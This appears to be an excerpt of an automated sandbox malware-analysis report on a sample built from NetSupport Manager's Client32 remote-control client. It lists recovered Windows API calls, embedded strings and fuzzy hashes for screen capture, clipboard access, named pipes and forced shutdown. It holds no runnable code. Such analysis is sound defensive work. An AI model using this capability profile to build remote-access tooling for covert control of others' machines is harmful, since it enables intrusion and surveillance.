                                                                                      • GetTokenInformation.KERNELBASE(00000000,00000001(TokenIntegrityLevel),?,00000048,?,?), ref: 110FACED
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: InformationToken
                                                                                      • String ID:
                                                                                      • API String ID: 4114910276-0
                                                                                      • Opcode ID: e293ede8765d0badea50781af9c0a4ddb492315e77c2591cd008e5b0916e1792
                                                                                      • Instruction ID: 5942e99df11cc5ddd12142181c934b3f7ef04b83757ceed83c361bf33f076152
                                                                                      • Opcode Fuzzy Hash: e293ede8765d0badea50781af9c0a4ddb492315e77c2591cd008e5b0916e1792
                                                                                      • Instruction Fuzzy Hash: 8911AC71E1011DDBDB11DFA8DC557EE73F8DB58305F0041D9E9099B240DA71AE488B90
                                                                                      APIs
                                                                                      • RtlAllocateHeap.NTDLL(00000008,110310DF,00000000,?,11169DD4,?,110310DF,00000000,00000000,00000000,?,1116B767,00000001,00000214,?,1110F4AE), ref: 111701A9
                                                                                        • Part of subcall function 111692EF: __getptd_noexit.LIBCMT ref: 111692EF
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: AllocateHeap__getptd_noexit
                                                                                      • String ID:
                                                                                      • API String ID: 328603210-0
                                                                                      • Opcode ID: 5fa111ebdd6cb86adb28227364e3270cd3b42bcfca1d5c7b723611f66f651fb7
                                                                                      • Instruction ID: 37eba9f6ddbe8283f17829f7b0a109b8136aa2f13792341ea1fc2e0acbbf6d66
                                                                                      • Opcode Fuzzy Hash: 5fa111ebdd6cb86adb28227364e3270cd3b42bcfca1d5c7b723611f66f651fb7
                                                                                      • Instruction Fuzzy Hash: 590124392013669BEB099F25EC60B5BB799AB83365F014529EC15CA3C0DB70D900C340
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: __waccess_s
                                                                                      • String ID:
                                                                                      • API String ID: 4272103461-0
                                                                                      • Opcode ID: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                      • Instruction ID: b67d37eb909022d12c4b3a5208e3be1f16578853890f7fcac85d973ba88585e6
                                                                                      • Opcode Fuzzy Hash: ef7a6628b8ba34dfa5084db135283d76d392227949a9b5e0c08c397448921cd0
                                                                                      • Instruction Fuzzy Hash: C5C09B3705811D7F5F055DE5EC00C557F5DD6806747148156F91C89590DD73E561D540
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: __fsopen
                                                                                      • String ID:
                                                                                      • API String ID: 3646066109-0
                                                                                      • Opcode ID: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                      • Instruction ID: 3fb95567750ac4c2837cb65daf82bfaf3169cdeaa60eaf7921ceae4fe4d00650
                                                                                      • Opcode Fuzzy Hash: 458c5a181ffae5f95d358663ef626c75276123e7ccc662156e21cb703a51c411
                                                                                      • Instruction Fuzzy Hash: 76C0927645424C77DF112A82EC02E4A7F2E9BC0668F448060FB1C19160AAB3EA71DACA
                                                                                      APIs
                                                                                      • _NSMClient32@8.PCICL32(?,?,?,008210A2,00000000), ref: 0082100B
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3580718425.0000000000821000.00000020.00000001.01000000.00000009.sdmp, Offset: 00820000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3580699277.0000000000820000.00000002.00000001.01000000.00000009.sdmp
                                                                                      • Associated: 00000004.00000002.3580738922.0000000000822000.00000002.00000001.01000000.00000009.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_820000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Client32@8
                                                                                      • String ID:
                                                                                      • API String ID: 433899448-0
                                                                                      • Opcode ID: 4d0d81f4ec4ebde950740ae3d3ffe2836bfeb21466b6828822f600e6eeb2d30b
                                                                                      • Instruction ID: 3b5da6fcc3abeb7a8d03ad64514e5dee16c4e52ebd5120bcea04ae6e619d87ac
                                                                                      • Opcode Fuzzy Hash: 4d0d81f4ec4ebde950740ae3d3ffe2836bfeb21466b6828822f600e6eeb2d30b
                                                                                      • Instruction Fuzzy Hash: 3FB092B211434D9B8B14EE99E845C7B339CBAA8600B000809BE0583282CA61FCA09672
                                                                                      APIs
                                                                                      • InterlockedIncrement.KERNEL32(111ED4B8), ref: 1102D382
                                                                                      • Sleep.KERNEL32(0000EA60), ref: 1102D3A5
                                                                                        • Part of subcall function 11026F20: PostThreadMessageA.USER32(00000000,00000501,1102D590,00000000), ref: 11026F72
                                                                                        • Part of subcall function 11026F20: Sleep.KERNEL32(00000032,?,1102D590,00000001), ref: 11026F76
                                                                                        • Part of subcall function 11026F20: PostThreadMessageA.USER32(00000000,00000012,00000000,00000000), ref: 11026F97
                                                                                        • Part of subcall function 11026F20: WaitForSingleObject.KERNEL32(00000000,00000032,?,1102D590,00000001), ref: 11026FA2
                                                                                        • Part of subcall function 11026F20: CloseHandle.KERNEL32(00000000,1102E392,?,1102D590,00000001), ref: 11026FB4
                                                                                        • Part of subcall function 11026F20: FreeLibrary.KERNEL32(00000000,00000000,00000000,1102E392,?,1102D590,00000001), ref: 11026FE1
                                                                                      • GetCurrentProcess.KERNEL32(00000020,00000000,00000000), ref: 1102D3AB
                                                                                      • SetPriorityClass.KERNEL32(00000000), ref: 1102D3B2
                                                                                      • SetEvent.KERNEL32(00000270), ref: 1102D3E7
                                                                                      • Sleep.KERNEL32(000007D0), ref: 1102D4D8
                                                                                      • PostThreadMessageA.USER32(00001E6C,00000000,00000000,00000000), ref: 1102D5BC
                                                                                      • CloseHandle.KERNEL32(0000027C), ref: 1102D815
                                                                                      • _free.LIBCMT ref: 1102D825
                                                                                      • _free.LIBCMT ref: 1102D841
                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1102D8D4
                                                                                      • GetFileAttributesA.KERNEL32(?), ref: 1102D8E1
                                                                                      • _memset.LIBCMT ref: 1102D983
                                                                                      • FindFirstFileA.KERNEL32(?,?,?,?,?,00000000,00000000), ref: 1102D99B
                                                                                      • FindNextFileA.KERNEL32(00000000,00000010,?,?,?,00000000,00000000), ref: 1102D9C2
                                                                                      • FindClose.KERNEL32(00000000,?,?,?,00000000,00000000), ref: 1102D9C9
                                                                                      • ExitWindowsEx.USER32(00000002,00000000), ref: 1102DAB7
                                                                                      • Sleep.KERNEL32(00002710), ref: 1102DABE
                                                                                      • ExitWindowsEx.USER32(00000006,00000000), ref: 1102DAD4
                                                                                      • Sleep.KERNEL32(000007D0), ref: 1102DAE0
                                                                                      • ExitProcess.KERNEL32 ref: 1102DAF4
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Sleep$File$CloseExitFindMessagePostThread$HandleProcessWindows_free$AttributesClassCurrentEventFirstFreeIncrementInterlockedLibraryModuleNameNextObjectPrioritySingleWait_memset
                                                                                      • String ID: *.*$405464$Audio$CLIENT32.CPP$Error %s unloading audiocap dll$Error. Multiple Terminate. $Finished terminate$HookDirectSound$Stop tracing, almost terminated$TermUI...$Termed$Terminate Client32 (err=%d)$Unload Hook$Warning. Unprocessed notify NC_CMD, cmd=%d$Warning. Unprocessed notify, type=%d$delete gMain.ev$deleted ipc$pSlash$remove smartcard devices$
                                                                                      • API String ID: 2369127096-377297859
                                                                                      • Opcode ID: add873a8ab015faf9889e95090e84e2001c1be1f53f7e8c1ad7b83b87d9131ad
                                                                                      • Instruction ID: 7f46233fb5632011b045e2eff7fc4cb47a6b13c38cfe1b2a85386abe64dfbaee
                                                                                      • Opcode Fuzzy Hash: add873a8ab015faf9889e95090e84e2001c1be1f53f7e8c1ad7b83b87d9131ad
                                                                                      • Instruction Fuzzy Hash: D212F778E001229FDB16DFE8CCC4E6DF7A6AB8470CFA401A9E52557644EB71BD80CB52
                                                                                      APIs
                                                                                      • IsIconic.USER32(?), ref: 111132BA
                                                                                      • GetTickCount.KERNEL32 ref: 1111332E
                                                                                      • CreateRectRgn.GDI32(00000000,?,?,?), ref: 11113352
                                                                                      • GetClientRect.USER32(?,?), ref: 11113402
                                                                                      • SetStretchBltMode.GDI32(?,00000004), ref: 11113534
                                                                                      • CreateRectRgn.GDI32(?,?,?,?), ref: 1111358F
                                                                                      • GetClipRgn.GDI32(?,00000000), ref: 111135A3
                                                                                      • OffsetRgn.GDI32(00000000,00000000,00000000), ref: 111135C8
                                                                                      • GetRgnBox.GDI32(00000000,?), ref: 111135D3
                                                                                      • SelectClipRgn.GDI32(?,00000000), ref: 111135E1
                                                                                      • StretchBlt.GDI32(?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 1111366B
                                                                                      • SelectClipRgn.GDI32(?,00000000), ref: 1111367A
                                                                                      • DeleteObject.GDI32(?), ref: 11113684
                                                                                      • StretchBlt.GDI32(?,?,?,?,?,?,00000000,00000000,?,?,00CC0020), ref: 111136C2
                                                                                      • GetWindowOrgEx.GDI32(?,?), ref: 111136D7
                                                                                      • StretchBlt.GDI32(?,?,?,00000000,00000000,?,?,?,?,?,00CC0020), ref: 1111371C
                                                                                      • GetKeyState.USER32(000000A3), ref: 11113747
                                                                                      • CreatePen.GDI32(00000000,00000001,000000FF), ref: 1111378B
                                                                                      • CreatePen.GDI32(00000000,00000001,00FFFFFF), ref: 1111379D
                                                                                      • SelectObject.GDI32(00000000,?), ref: 111137B1
                                                                                      • Polyline.GDI32(00000000,?,00000005), ref: 111137C7
                                                                                      • Sleep.KERNEL32(00000032), ref: 111137CF
                                                                                      • SelectObject.GDI32(00000000,?), ref: 111137E0
                                                                                      • Polyline.GDI32(00000000,?,00000005), ref: 111137F3
                                                                                      • Sleep.KERNEL32(00000032), ref: 111137FB
                                                                                      • SelectObject.GDI32(00000000,?), ref: 1111380C
                                                                                      • DeleteObject.GDI32(?), ref: 11113816
                                                                                      • DeleteObject.GDI32(?), ref: 11113820
                                                                                      • BitBlt.GDI32(00000000,00000000,00000000,00004000,?,?,00000000,00000000,00CC0020), ref: 11113845
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: Object$Select$CreateStretch$ClipDeleteRect$PolylineSleep$ClientCountIconicModeOffsetStateTickWindow
                                                                                      • String ID:
                                                                                      • API String ID: 879653699-0
                                                                                      • Opcode ID: d401745ce30a04a168751c86834ada46f257f5b09613656bfb34517905d94607
                                                                                      • Instruction ID: 189fb298e01def9bf465b0ce988e90e2b94731e78913cb033f8d66d61a6768cc
                                                                                      • Opcode Fuzzy Hash: d401745ce30a04a168751c86834ada46f257f5b09613656bfb34517905d94607
                                                                                      • Instruction Fuzzy Hash: E112F7B1A147099FDB14CFB8C984AAEF7F9EF88315F10452DE55A9B258DB70A841CF10
                                                                                      APIs
                                                                                      • SHGetFolderPathA.SHFOLDER(00000000,00000005,00000000,00000000,?), ref: 1103B1B2
                                                                                      • GetUserNameA.ADVAPI32(?,?), ref: 1103B1D9
                                                                                        • Part of subcall function 110D0710: __strdup.LIBCMT ref: 110D072A
                                                                                      • DeleteFileA.KERNEL32(?), ref: 1103B23A
                                                                                      • _sprintf.LIBCMT ref: 1103B2BB
                                                                                      • _fputs.LIBCMT ref: 1103B330
                                                                                      • GetFileAttributesA.KERNEL32(?), ref: 1103B3A1
                                                                                      • _free.LIBCMT ref: 1103B336
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      • SetFileAttributesA.KERNEL32(?,00000000), ref: 1103B3DF
                                                                                        • Part of subcall function 11029450: _strrchr.LIBCMT ref: 11029545
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029584
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: File$AttributesExitProcess$DeleteErrorFolderLastMessageNamePathUser__strdup_fputs_free_sprintf_strrchrwsprintf
                                                                                      • String ID: %05d$IsA()$P$\Rewards.bin$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
                                                                                      • API String ID: 383231468-3762817415
                                                                                      • Opcode ID: 2af526d8f5190e790c0ca9edbbc40dfe78f9b0864dccbff27541257fc5a2cfb5
                                                                                      • Instruction ID: bb1b01960f0c7610cbc3075388277e5ec166904b02cd10daef8a33cd2ba906d0
                                                                                      • Opcode Fuzzy Hash: 2af526d8f5190e790c0ca9edbbc40dfe78f9b0864dccbff27541257fc5a2cfb5
                                                                                      • Instruction Fuzzy Hash: 7A71A235D4462AAFDB15CB64CC54FEEB3B4AF54308F0442D8E819A7284EB71AA44CFA0
                                                                                      APIs
                                                                                      • GetWindowRect.USER32(00000000,?), ref: 110CB339
                                                                                      • IsIconic.USER32(00000001), ref: 110CB349
                                                                                      • GetClientRect.USER32(00000001,?), ref: 110CB358
                                                                                      • GetSystemMetrics.USER32(00000000), ref: 110CB36D
                                                                                      • GetSystemMetrics.USER32(00000001), ref: 110CB374
                                                                                      • IsIconic.USER32(00000001), ref: 110CB3A4
                                                                                      • GetWindowRect.USER32(00000001,?), ref: 110CB3B3
                                                                                      • SetWindowPos.USER32(?,00000000,?,11185BBB,00000000,00000000,0000001D,00000000,?,00000001,?,00000002,?,?), ref: 110CB467
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: RectWindow$IconicMetricsSystem$ClientErrorExitLastMessageProcesswsprintf
                                                                                      • String ID: ..\ctl32\nsmdlg.cpp$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_eh$m_hWnd
                                                                                      • API String ID: 2655531791-1552842965
                                                                                      • Opcode ID: 336b00d43c8ecb03fd1d32f6a3e6328df4ddd987a58dd775271b0821d673290e
                                                                                      • Instruction ID: 7d040125c55bf73af4456014bc99c48d8e10f47c0045797434645e7542fd0d49
                                                                                      • Opcode Fuzzy Hash: 336b00d43c8ecb03fd1d32f6a3e6328df4ddd987a58dd775271b0821d673290e
                                                                                      • Instruction Fuzzy Hash: 2C51C175E0061AAFCB10CFA4CC84FEEB7F8FB48754F0481A9E915A7280EA74A940CF50
                                                                                      APIs
                                                                                      • LocalAlloc.KERNEL32(00000040,00000014,?,00000000), ref: 110F33FC
                                                                                      • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 110F3425
                                                                                      • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 110F3432
                                                                                      • CreateNamedPipeA.KERNEL32(?,00000003,00000006,00000001,?,?,000003E8,?), ref: 110F3463
                                                                                      • GetLastError.KERNEL32 ref: 110F3470
                                                                                      • Sleep.KERNEL32(000003E8), ref: 110F348F
                                                                                      • CreateNamedPipeA.KERNEL32(?,00000003,00000006,00000001,00000001,?,000003E8,0000000C), ref: 110F34AE
                                                                                      • LocalFree.KERNEL32(?), ref: 110F34BF
                                                                                        • Part of subcall function 11029450: GetLastError.KERNEL32(?,00000000,?), ref: 1102946C
                                                                                        • Part of subcall function 11029450: wsprintfA.USER32 ref: 110294B7
                                                                                        • Part of subcall function 11029450: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 110294F3
                                                                                        • Part of subcall function 11029450: ExitProcess.KERNEL32 ref: 11029509
                                                                                      Strings
                                                                                      • pSD, xrefs: 110F3415
                                                                                      • e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp, xrefs: 110F3410
                                                                                      • CreateNamedPipe %s failed, error %d, xrefs: 110F3478
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID: CreateDescriptorErrorLastLocalNamedPipeSecurity$AllocDaclExitFreeInitializeMessageProcessSleepwsprintf
                                                                                      • String ID: CreateNamedPipe %s failed, error %d$e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp$pSD
                                                                                      • API String ID: 3134831419-838605531
                                                                                      • Opcode ID: 6fb66e34af5f69f470863fb769d28e04784f24a47ad29a0bb3f1c0886bbebacf
                                                                                      • Instruction ID: e749730b24da6d9d65aa5dc542e4a1298255c3932a1a24cca1bc6d9c8703c538
                                                                                      • Opcode Fuzzy Hash: 6fb66e34af5f69f470863fb769d28e04784f24a47ad29a0bb3f1c0886bbebacf
                                                                                      • Instruction Fuzzy Hash: 0821DD75E54229BBE7119B64CC8AFAFB76CE744719F014210FE25672C0C7B05A018790
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000004.00000002.3582360542.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                      • Associated: 00000004.00000002.3582342719.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582465656.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582502626.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582522763.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      • Associated: 00000004.00000002.3582540900.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                      Yara matches
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: CheckClip Error: Can't open clip, e=%d$Client$DisableClipBoard$Sendclip Error: Cant open clip$openclip Error: Cant open clip
                                                                                      • API String ID: 0-293745777
                                                                                      • Opcode ID: 5f040545b05273c81cb9d4a4bd22d43a279a27486dfb0bd605f0804696ac8a8f
                                                                                      • Instruction ID: daee403c678e01c213c7a1d72acf829bd0b7d6ab4ed81c5860d9e9f482a37d6e
                                                                                      • Opcode Fuzzy Hash: 5f040545b05273c81cb9d4a4bd22d43a279a27486dfb0bd605f0804696ac8a8f
                                                                                      • Instruction Fuzzy Hash: 7AA1F535B102069FD710DFA5DC91FAAF3A4EFD834AF10459DEA4A9B380DA31B940CB91
                                                                                      APIs
                                                                                      • SetUnhandledExceptionFilter.KERNEL32(11147750), ref: 11093089
                                                                                        • Part of subcall function 1110F420: _malloc.LIBCMT ref: 1110F439
                                                                                        • Part of subcall function 1110F420: wsprintfA.USER32 ref: 1110F454
                                                                                        • Part of subcall function 1110F420: _memset.LIBCMT ref: 1110F477
                                                                                      • OpenEventA.KERNEL32(001F0003,00000000,NSMFindClassEvent), ref: 110930B9
                                                                                      • FindWindowA.USER32(NSMClassList,00000000), ref: 110930CA
                                                                                      • SetForegroundWindow.USER32(00000000), ref: 110930D1
                                                                                        • Part of subcall function 110914F0: GlobalAddAtomA.KERNEL32(NSMClassList), ref: 11091552
                                                                                        • Part of subcall function 11092FF0: GetClassInfoA.USER32(110930EC,NSMClassList,?), ref: 11093004
                                                                                        • Part of subcall function 11091620: CreateWindowExA.USER32(00000000,NSMClassList,00000000,00000000), ref: 1109166D
                                                                                        • Part of subcall function 11091620: UpdateWindow.USER32(?), ref: 110916BF
                                                                                      • CreateEventA.KERNEL32(00000000,00000000,00000001,NSMFindClassEvent,?,00000000,?,00000000), ref: 11093111
